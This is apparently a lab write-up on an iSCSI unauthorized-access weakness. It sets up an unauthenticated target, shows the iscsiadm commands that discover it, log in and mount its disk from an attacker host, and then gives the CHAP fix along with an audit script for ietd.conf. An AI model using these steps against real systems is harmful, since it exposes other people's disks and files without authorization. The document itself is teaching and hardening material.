iSCSI Unauthorized Access Vulnerability
Environment Setup
- Target
  - OS: Ubuntu 14.04
  - IP: 192.168.197.135
- Attacker
  - OS: CentOS 7
  - IP: 192.168.197.136
Configuring the iSCSI Server
Install iscsitarget:
# apt-get install iscsitarget
Edit the configuration file /etc/default/iscsitarget:
ISCSITARGET_ENABLE=true
ISCSITARGET_MAX_SLEEP=3
# ietd options
# See ietd(8) for details
ISCSITARGET_OPTIONS=""
Edit the other configuration file, /etc/iet/ietd.conf:
Target iqn.2016-08.ll.test:storage
Lun 0 Path=/dev/sda,Type=fileio,ScsiId=lun0,ScsiSN=lun0
Then restart the iSCSI service:
# /etc/init.d/iscsitarget restart
* Removing iSCSI enterprise target devices:[ OK ]
* Stopping iSCSI enterprise target service:[ OK ]
* Removing iSCSI enterprise target modules:[ OK ]
* Starting iSCSI enterprise target service:[ OK ]
Testing
First, install the required tools:
sudo yum install epel-release
sudo yum install scsi-target-utils
sudo yum install iscsi-initiator-utils
Next, discover the target's IQN. If discovery fails, check whether the iscsid service is running; if it is not, start it with service iscsi start.
$ sudo iscsiadm --mode discovery --type sendtargets --portal 192.168.197.135
192.168.197.135:3260,1 iqn.2016-08.ll.test:storage
172.17.42.1:3260,1 iqn.2016-08.ll.test:storage
Once the IQN has been discovered, the disk can simply be attached by logging in to the target:
$ sudo iscsiadm -m node -T iqn.2016-08.ll.test:storage -p 192.168.197.135 -l
Logging in to [iface: default, target: iqn.2016-08.ll.test:storage, portal: 192.168.197.135,3260] (multiple)
Login to [iface: default, target: iqn.2016-08.ll.test:storage, portal: 192.168.197.135,3260] successful.
Check where the disk was attached:
sudo fdisk -l
Disk /dev/sda: 21.5 GB, 21474836480 bytes, 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x0004df07
Device Boot Start End Blocks Id System
/dev/sda1 * 2048 1026047 512000 83 Linux
/dev/sda2 1026048 41943039 20458496 8e Linux LVM
Disk /dev/mapper/centos-root: 18.8 GB, 18756927488 bytes, 36634624 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/mapper/centos-swap: 2147 MB, 2147483648 bytes, 4194304 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/sdc: 42.9 GB, 42949672960 bytes, 83886080 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x00023447
Device Boot Start End Blocks Id System
/dev/sdc1 * 2048 79693823 39845888 83 Linux
/dev/sdc2 79695870 83884031 2094081 5 Extended
/dev/sdc5 79695872 83884031 2094080 82 Linux swap / Solaris
Here sdc is the attached Ubuntu disk; mount it:
# mkdir /tmp/ubuntu
# mount /dev/sdc1 /tmp/ubuntu
# cd /tmp/ubuntu
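The files on the Ubuntu machine are now accessible.
So if you come across an iSCSI service during a penetration test or on an internal network, it is worth trying to mount it.
Disconnecting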
iscsiadm -m node -u
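Remediation
Fixing this vulnerability is also very simple: just add authentication, although the password apparently cannot be longer than 12 characters.
Change the configuration file to: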
Target iqn.2016-08.ll.test:storage
Lun 1 Path=/dev/sda,Type=fileio,ScsiId=lun1,ScsiSN=lun1
incominguser your_username your_password
To connect to a password-protected iSCSI target, the credentials must first be configured in /etc/iscsi/iscsid.conf.
To connect to an iSCSI service from Ubuntu, open-iscsi and open-iscsi-utils need to be installed.
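As an added example (not part of the original write-up), the following Python script audits an ietd.conf for targets that export a LUN without a target-level IncomingUser line, which is the condition the fix above removes. The second target name, the discovery account and the function names are constructed for illustration; keywords are matched case-insensitively as an assumption, so the lowercase spelling used above is also recognised.

```python
import sys

# Constructed sample in ietd.conf format (not from a real host). The first
# target matches the page's vulnerable config; ":backup" is a made-up name.
SAMPLE_IETD_CONF = """\
# A global IncomingUser authenticates discovery sessions only.
IncomingUser disco_user disco_secret

Target iqn.2016-08.ll.test:storage
    Lun 0 Path=/dev/sda,Type=fileio,ScsiId=lun0,ScsiSN=lun0

Target iqn.2016-08.ll.test:backup
    Lun 1 Path=/dev/sdb,Type=fileio,ScsiId=lun1,ScsiSN=lun1
    IncomingUser your_username your_password
"""


def audit_ietd_conf(text):
    """Map each target IQN to its exported LUNs and target-level CHAP users."""
    targets, current = {}, None
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if not fields:
            continue
        keyword = fields[0].lower()  # assumption: keywords compared case-insensitively
        if keyword == "target" and len(fields) >= 2:
            current = targets.setdefault(fields[1], {"luns": [], "chap_users": []})
        elif current is None:
            continue  # global section: does not protect login to a target
        elif keyword == "lun" and len(fields) >= 3:
            current["luns"].append(fields[1])
        elif keyword == "incominguser" and len(fields) >= 3:
            current["chap_users"].append(fields[1])  # user name only, never the secret
    return targets


def unauthenticated_targets(text):
    """Targets that export at least one LUN and have no IncomingUser of their own."""
    return sorted(iqn for iqn, t in audit_ietd_conf(text).items()
                  if t["luns"] and not t["chap_users"])


if __name__ == "__main__":
    # Pass the path to ietd.conf as the first argument; without one the sample is audited.
    conf = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_IETD_CONF
    for iqn in unauthenticated_targets(conf):
        print("no CHAP on target:", iqn)
```

Run against the sample, it reports only iqn.2016-08.ll.test:storage, because the global IncomingUser line does not count toward any target.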